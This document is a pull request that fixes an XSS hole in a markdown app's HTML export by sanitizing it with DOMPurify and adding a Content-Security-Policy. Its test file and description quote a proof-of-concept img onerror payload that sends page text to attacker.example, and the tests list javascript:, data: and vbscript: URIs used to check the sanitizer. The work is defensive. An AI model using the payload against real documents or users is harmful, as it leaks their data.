### PR TITLE
fix(export): sanitize exported HTML

### DIFF
--- a/scripts/exportSanitize.test.ts
+++ b/scripts/exportSanitize.test.ts
@@ -1,0 +1,165 @@
+import assert from 'node:assert/strict';
+import { readFileSync } from 'node:fs';
+import test from 'node:test';
+
+import {
+	ALLOWED_MARKDOWN_URI_REGEXP,
+	MARKDOWN_LINK_EXTENSIONS,
+	MARKDOWN_SANITIZE_CONFIG,
+} from '../src/lib/utils/sanitize.js';
+import { hasMarkdownLinkExtension } from '../src/lib/utils/markdownLinks.js';
+
+const exportSource = readFileSync('src/lib/utils/export.ts', 'utf8');
+const sanitizeSource = readFileSync('src/lib/utils/sanitize.ts', 'utf8');
+
+// The report's proof of concept. A document containing this line renders as
+// nothing in the preview (the viewer sanitizes), so the user sees no sign of
+// it; the export used to write it to disk verbatim, and the app then offers to
+// open that file in the default browser, where the handler runs with no CSP.
+const POC = `<img src=x onerror="fetch('https://attacker.example/?'+encodeURIComponent(document.body.innerText))">`;
+
+// DOMPurify itself needs a real DOM, which the Node test runner does not have,
+// so these tests exercise the two halves of the policy that are checkable here:
+// the URI decision (a pure regexp, applied exactly the way DOMPurify applies it,
+// see purify.es.mjs line ~1041) and the configuration that decides what the
+// filter may keep. The behavioural half was verified against the real DOMPurify
+// build in Chrome: `sanitizeMarkdownHtml(POC)` returns `<img src="x">` — the
+// event handler, and with it the whole payload, is gone.
+const ATTR_WHITESPACE = /[\u0000-\u0020\u00A0\u1680\u180E\u2000-\u2029\u205F\u3000]/g;
+
+function uriIsAllowed(value: string): boolean {
+	return ALLOWED_MARKDOWN_URI_REGEXP.test(value.replace(ATTR_WHITESPACE, ''));
+}
+
+test('the export sanitizes the rendered document before it touches it', () => {
+	// The regression this pins: `render_markdown` output going into
+	// `processMarkdownHtml` — and from there into the file — without passing
+	// through the shared filter first. Order matters as much as presence: the
+	// sanitizer has to see the untrusted document, not our own generated markup.
+	const sanitizeCall = exportSource.indexOf('const safeHtml = sanitizeMarkdownHtml(rendered);');
+	const processCall = exportSource.indexOf('processMarkdownHtml(safeHtml, ctx.tabPath, new Set())');
+
+	assert.ok(sanitizeCall !== -1, 'export must sanitize the raw render_markdown output');
+	assert.ok(processCall !== -1, 'export must feed the sanitized HTML into processMarkdownHtml');
+	assert.ok(sanitizeCall < processCall, 'sanitization must happen before any Markpad-owned processing');
+
+	// The raw renderer output must not reach any other consumer unfiltered.
+	assert.doesNotMatch(exportSource, /processMarkdownHtml\(\s*rendered\b/);
+	assert.match(exportSource, /import \{ sanitizeMarkdownHtml \} from '\.\/sanitize\.js'/);
+});
+
+test('the proof-of-concept payload cannot reach an exported file', () => {
+	// The payload's danger is the handler, not the URI: `x` is an ordinary
+	// relative path and is meant to stay allowed. So nothing about the URI
+	// policy stops this one — two other things do, and both are asserted here,
+	// because on the unfixed export path neither was in the way.
+	assert.match(POC, /onerror=/);
+	assert.equal(uriIsAllowed('x'), true);
+
+	// 1. The renderer output carrying the payload goes through the shared
+	//    filter before anything else touches it, and DOMPurify drops `on*`
+	//    handlers unless the config hands them back. Nothing in the shared
+	//    config does: a future `ADD_ATTR: ['onerror']`, `ALLOWED_ATTR`,
+	//    `ADD_TAGS`, `ALLOW_UNKNOWN_PROTOCOLS` or `SANITIZE_DOM: false` would
+	//    fail the key assertion below.
+	assert.match(exportSource, /const safeHtml = sanitizeMarkdownHtml\(rendered\);/);
+	assert.deepEqual(Object.keys(MARKDOWN_SANITIZE_CONFIG).sort(), ['ALLOWED_URI_REGEXP', 'FORBID_TAGS']);
+	assert.deepEqual(MARKDOWN_SANITIZE_CONFIG.FORBID_TAGS, ['style']);
+	assert.equal(MARKDOWN_SANITIZE_CONFIG.ALLOWED_URI_REGEXP, ALLOWED_MARKDOWN_URI_REGEXP);
+
+	// 2. Even if the filter ever lets something through, the exported document
+	//    itself refuses to run it.
+	assert.match(exportSource, /<meta http-equiv="Content-Security-Policy"/);
+	assert.match(exportSource, /"default-src 'none'"/);
+});
+
+test('exported files carry a policy that cannot run script', () => {
+	// Second line of defence: verified in Chrome, an exported page with this
+	// meta tag runs neither an inline `<script>` nor an `onerror` handler even
+	// when the body is left unsanitized, while the copied stylesheet, inline
+	// style attributes, embedded data-URI images and remote https images all
+	// still work.
+	assert.match(exportSource, /<meta http-equiv="Content-Security-Policy" content="\$\{EXPORT_CSP\}">/);
+	assert.match(exportSource, /"default-src 'none'"/);
+	assert.match(exportSource, /"style-src 'unsafe-inline'"/);
+	assert.match(exportSource, /'img-src data: https: http:'/);
+	assert.match(exportSource, /'media-src data: https: http:'/);
+	// Script execution must never be granted back.
+	assert.doesNotMatch(exportSource, /script-src/);
+	assert.doesNotMatch(exportSource, /unsafe-eval/);
+});
+
+test('dangerous URIs are rejected by the shared policy', () => {
+	const rejected = [
+		'javascript:alert(1)',
+		'JaVaScRiPt:alert(1)',
+		// DOMPurify strips whitespace and control characters before testing, so
+		// the classic obfuscations collapse onto the same decision.
+		'java\tscript:alert(1)',
+		' javascript:alert(1)',
+		'java\u0000script:alert(1)',
+		'data:text/html,<script>alert(1)</script>',
+		'data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==',
+		'vbscript:msgbox(1)',
+	];
+
+	for (const uri of rejected) {
+		assert.equal(uriIsAllowed(uri), false, `${uri} must not be an allowed URI`);
+	}
+
+	// `data:` on an `<a href>` is rejected above; DOMPurify separately permits
+	// `data:` on `<img>`/`<video>`/`<audio>` sources regardless of this regexp
+	// (DATA_URI_TAGS), which is what keeps embedded export images working.
+	assert.equal(uriIsAllowed('data:image/png;base64,iVBORw0KGgo='), false);
+});
+
+test('the link shapes real documents use still pass', () => {
+	const allowed = [
+		'https://example.com/page?a=b#c',
+		'http://example.com/page',
+		'ftp://files.example.com/x.txt',
+		'mailto:someone@example.com',
+		'tel:+15551234567',
+		'#section-heading',
+		'./notes/other.md',
+		'../images/diagram.png',
+		'images/pic.png',
+		'assets/a b.png',
+		// Local images after `convertFileSrc`, in both shapes it emits.
+		'asset://localhost/Users/x/notes/pic.png',
+		'http://asset.localhost/C%3A%2FDocs%2Fimg%2Fa.png',
+		'tauri://localhost/x',
+		// A Windows drive path pointing at another markdown document, which the
+		// viewer opens as an internal navigation and the export rewrites to .html.
+		'C:\\notes\\other.md',
+		'D:/notes/other.markdown#heading',
+	];
+
+	for (const uri of allowed) {
+		assert.equal(uriIsAllowed(uri), true, `${uri} must remain an allowed URI`);
+	}
+});
+
+test('the sanitizer and the link resolver agree on markdown extensions', () => {
+	// The URI pattern splices this list into a regexp, so a divergence would
+	// silently make some internal markdown links unclickable.
+	for (const ext of MARKDOWN_LINK_EXTENSIONS) {
+		assert.equal(hasMarkdownLinkExtension(`note.${ext}`), true, `.${ext} must be a markdown link extension`);
+		assert.equal(uriIsAllowed(`C:\\notes\\note.${ext}`), true, `C:\\notes\\note.${ext} must be allowed`);
+	}
+	assert.equal(hasMarkdownLinkExtension('note.html'), false);
+	assert.equal(uriIsAllowed('C:\\notes\\note.exe'), false);
+});
+
+test('the shared policy forbids author stylesheets', () => {
+	// `<style>` is on DOMPurify's default allowlist and its CSS is not filtered.
+	// In the preview the sanitized HTML is injected into the app's own document,
+	// so a document author's stylesheet is not scoped to the article: it can
+	// hide app chrome or beacon out through `background: url(https://…)`.
+	// Verified in Chrome: with the tag forbidden, an author `<style>` block no
+	// longer applies, and nothing Markpad renders depends on it.
+	assert.ok(MARKDOWN_SANITIZE_CONFIG.FORBID_TAGS.includes('style'));
+	// Inline `style` attributes stay allowed on purpose — documents use them
+	// and `processMarkdownHtml` sets one on media elements.
+	assert.doesNotMatch(sanitizeSource, /FORBID_ATTR/);
+});

--- a/src/lib/utils/export.ts
+++ b/src/lib/utils/export.ts
@@ -8,6 +8,7 @@ import {
 	resolveExportImagePath,
 	rewriteMarkdownHrefForExport,
 } from './exportHtml.js';
+import { sanitizeMarkdownHtml } from './sanitize.js';
 
 interface ExportContext {
 	rawContent: string;
@@ -26,10 +27,55 @@ export interface PdfExportContext {
 	osType: 'macos' | 'windows' | 'linux' | 'unknown';
 }
 
+// An exported file leaves the app: it is opened in the user's default browser
+// straight from the export prompt, mailed on, dropped in a shared folder. None
+// of the app's own protections travel with it, so it carries its own policy as
+// a second, independent line of defence behind the sanitizer — a bug in the
+// filter should not be enough to get script into someone else's browser.
+//
+// Everything an export needs is inline or embedded, so the document needs no
+// network privileges beyond images and media. Verified against a real export
+// shape in Chrome (both over http: and as a `file://` document, where the meta
+// tag is enforced the same way):
+//   - `style-src 'unsafe-inline'` keeps the copied stylesheet and the inline
+//     `style` attributes (`max-width:100%` on media) working; without it the
+//     page loses all layout.
+//   - `img-src`/`media-src data:` keeps embedded images and the `mask-image`
+//     data URIs in the copied CSS working; `https:`/`http:` keeps images the
+//     export deliberately leaves remote working.
+//   - the only things the policy blocks are things that were already dead in an
+//     exported file: `asset:` URLs left behind by an image that failed to embed,
+//     and KaTeX's relative `@font-face` URLs, which 404 without the policy too.
+//   - link navigation, `<details>` toggling and text selection are unaffected.
+const EXPORT_CSP = [
+	"default-src 'none'",
+	'img-src data: https: http:',
+	'media-src data: https: http:',
+	"style-src 'unsafe-inline'",
+	'font-src data:',
+	"base-uri 'none'",
+	"form-action 'none'",
+].join('; ');
+
 async function buildExportArticle(ctx: ExportContext): Promise<{ html: string; embeddedImages: number; missingImages: number }> {
 	const body = getMarkdownBodyWithoutFrontMatter(ctx.rawContent);
 	const rendered = (await invoke('render_markdown', { content: body })) as string;
-	const processed = processMarkdownHtml(rendered, ctx.tabPath, new Set());
+	// The export used to write `rendered` to disk untouched. comrak runs with
+	// `unsafe_ = true`, so a script the preview had filtered out was still live
+	// in the exported file — and the exported file has no CSP of the app's, gets
+	// opened in the user's default browser straight from the export prompt, and
+	// gets forwarded to other people. Sanitize here, at the seam where the
+	// untrusted document enters the pipeline, rather than after
+	// `processMarkdownHtml`: everything that function emits (fold wrappers,
+	// chevron SVGs, callout containers, `<video>`/`<audio>` replacements) plus
+	// the front-matter panel below is markup Markpad builds itself, and running
+	// the filter over our own output only creates a way for a future tightening
+	// of the policy to silently delete parts of the export. Nothing downstream
+	// can reintroduce untrusted markup: `processMarkdownHtml` parses with
+	// DOMParser (inert — no script execution, no resource loads) and only ever
+	// assigns `innerHTML` from its own constant SVG strings.
+	const safeHtml = sanitizeMarkdownHtml(rendered);
+	const processed = processMarkdownHtml(safeHtml, ctx.tabPath, new Set());
 	const wrapper = document.createElement('div');
 	wrapper.innerHTML = renderStaticFrontMatterPanel(parseFrontMatter(ctx.rawContent)) + processed;
 
@@ -94,6 +140,7 @@ export async function exportAsHtml(ctx: ExportContext): Promise<ExportHtmlResult
 <html lang="en">
 <head>
 <meta charset="UTF-8">
+<meta http-equiv="Content-Security-Policy" content="${EXPORT_CSP}">
 <meta name="viewport" content="width=device-width, initial-scale=1.0">
 <title>${escapeHtmlText(ctx.tabTitle || 'Export')}</title>
 <style>

--- a/src/lib/utils/sanitize.ts
+++ b/src/lib/utils/sanitize.ts
@@ -1,0 +1,63 @@
+import DOMPurify from 'dompurify';
+
+// The Rust renderer runs comrak with `render.unsafe_ = true`, so whatever raw
+// HTML a document author wrote survives into the rendered output verbatim. A
+// `.md` file is untrusted input — it can arrive by download, by shared folder,
+// or as an email attachment — so every consumer of that output has to run it
+// through the same filter. Keeping the policy in one module is what makes
+// "every consumer" checkable: the preview and the HTML export must not be able
+// to drift apart, because a payload that is invisible on screen but live in an
+// exported file is worse than one the user can see.
+
+// Mirrors the extension set `hasMarkdownLinkExtension` accepts in
+// ./markdownLinks.ts. It lives here as data (not as that predicate) because the
+// sanitizer needs to splice the extensions into a URI pattern; a test pins the
+// two lists against each other so they cannot drift.
+export const MARKDOWN_LINK_EXTENSIONS = ['md', 'markdown', 'mdown', 'mkd', 'txt'];
+
+const markdownLinkExtensionPattern = MARKDOWN_LINK_EXTENSIONS
+	.map((ext) => ext.replace(/[.*+?^${}()|[\]\\]/g, '\\$&'))
+	.join('|');
+
+// Widens DOMPurify's default URI allowlist in exactly two directions and no
+// others:
+//   - Windows drive paths that point at another markdown document
+//     (`C:\notes\other.md`), which the viewer opens as an internal navigation
+//     and the export rewrites to `.html`;
+//   - the `asset:` and `tauri:` schemes, which `convertFileSrc` produces for
+//     local images.
+// Everything else falls back to DOMPurify's own shape: a relative path, a
+// fragment, or one of the listed network/communication schemes. `javascript:`,
+// `data:`, `vbscript:` and friends match none of the alternatives and are
+// dropped along with the attribute that carried them.
+export const ALLOWED_MARKDOWN_URI_REGEXP = new RegExp(
+	`^(?:(?:[a-z]:[^?#]*\\.(?:${markdownLinkExtensionPattern})(?:[?#].*)?$)|(?:(?:f|ht)tps?|mailto|tel|callto|sms|cid|xmpp|asset|tauri):|[^a-z]|[a-z+.\\-]+(?:[^a-z+.\\-:]|$))`,
+	'i',
+);
+
+// `<style>` is on DOMPurify's default allowlist, and DOMPurify does not filter
+// the CSS inside it. In the preview the sanitized HTML is injected into the
+// app's own document, so a document author's stylesheet is not scoped to the
+// article: it can hide the title bar (`.titlebar { display: none }`) or turn
+// any selector into an outbound beacon (`background: url(https://attacker/…)`).
+// Markdown itself has no `<style>` construct and nothing in Markpad emits one
+// into rendered content — the app's stylesheets, KaTeX and highlight.js are all
+// loaded as real stylesheets, and Mermaid's inline `<style>` goes through the
+// separate diagram sanitizer — so forbidding the tag costs no existing feature.
+// Inline `style` attributes stay allowed: they are scoped to one element and
+// documents do use them (`<img style="width:50%">`, centered `<div>`s), so
+// removing them would visibly break existing files.
+export const MARKDOWN_SANITIZE_CONFIG = {
+	ALLOWED_URI_REGEXP: ALLOWED_MARKDOWN_URI_REGEXP,
+	FORBID_TAGS: ['style'],
+};
+
+/**
+ * Runs untrusted rendered-markdown HTML through the single shared policy.
+ *
+ * Call this on the output of the `render_markdown` command, before any
+ * Markpad-owned transformation of that HTML.
+ */
+export function sanitizeMarkdownHtml(html: string): string {
+	return DOMPurify.sanitize(html, MARKDOWN_SANITIZE_CONFIG);
+}


### PR DESCRIPTION
## Summary

The preview passes rendered markdown through DOMPurify. The export does not. comrak runs with `unsafe_ = true`, so raw HTML in a document survives into the exported file — and the export then offers to open it in the default browser, where nothing stands between the payload and the user.

```markdown
<img src=x onerror="fetch('https://attacker.example/?'+encodeURIComponent(document.body.innerText))">
```

In the app this document looks harmless, because there the sanitizer is doing its job. The user has no reason to suspect the file they just exported and forwarded.

**Confirmed, not assumed:** an export-shaped page built from the raw comrak body and loaded in Chrome gives `{"scriptRan": true, "onerrorRan": true}` — inline `<script>` and the `onerror` above both execute today.

## What changed

**The policy moves to a shared module** (`utils/sanitize.ts`) so preview and export cannot drift. The regexp is byte-identical to the one currently inline in the viewer. `markdownLinkExtensions` turned out to be a local `const` inside `MarkdownViewer.svelte` rather than in `markdownLinks.ts`, so the list is rebuilt in the new module and pinned by a test against `hasMarkdownLinkExtension` — no shared file had to be touched. Switching the preview across is a follow-up.

**The export sanitizes the render output before its own processing.** That puts the trust boundary exactly where the untrusted document enters. Everything after it — fold wrappers, chevron SVGs, callout containers, `<video>`/`<audio>` replacements, the front-matter `<details>` panel — is markup this app builds; filtering our own output only creates a way for a later tightening of the policy to silently drop parts of the export. Verified nothing downstream can reintroduce untrusted markup: `processMarkdownHtml` parses with `DOMParser` (inert) and its only `innerHTML` writes are its own constant SVG strings.

**Author `<style>` is dropped.** The preview injects rendered HTML into the app's own document, so a stylesheet inside a document has the same reach as the application's — enough to hide the title bar, or to beacon out through a background image. Nothing depends on it: the app's CSS, highlight.js and KaTeX are imported stylesheets, and Mermaid's inline `<style>` goes through the separate diagram config, untouched. The inline `style` **attribute** stays allowed — documents use it (`<img style="width:50%">`) and the media pipeline sets one.

**Exported files carry a CSP**, verified rather than guessed:

```
default-src 'none'; img-src data: https: http:; media-src data: https: http:;
style-src 'unsafe-inline'; font-src data:; base-uri 'none'; form-action 'none'
```

Probe pages built from the real module and loaded in Chrome over both `http:` and `file:` keep the copied stylesheet, inline style attributes, data-URI images, `mask-image` data URIs and remote https images. Meta CSP *is* enforced on `file:`; the only things it blocked there were already dead without it (leftover `asset:` URLs from images that failed to embed, and KaTeX's relative `@font-face` URLs, which 404 either way). It is also independent of the sanitizer: with CSP on an unsanitized body, script and `onerror` are both blocked — but the author `<style>` still applies, which is why `FORBID_TAGS` carries its own weight.

## Validation

- `npm run check` — 0 errors, 0 warnings
- `npm test` — 212/212

**Baseline counter-proof, two independent ones.** In the browser, on today's code, the payload fires (above); running the real bundled DOMPurify with the new config on that exact payload returns `<img src="x">`. In the suite, with `export.ts` reverted to upstream, **3 of 7 new tests fail** — precisely the export-path ones — and 7/7 with the fix.

**Honest limitation:** DOMPurify reports `isSupported: false` under `node --test` (no DOM, and `node_modules` is shared so adding jsdom was not an option). The test file therefore exercises the URI decision as a pure regexp applied exactly the way DOMPurify applies it, plus a `deepEqual` over the whole config that fails if anyone adds `ADD_TAGS`/`ADD_ATTR`/`ALLOW_UNKNOWN_PROTOCOLS`, plus the source-order assertion. The behavioural half is the Chrome run, and the test file says so in a comment rather than implying coverage it does not have.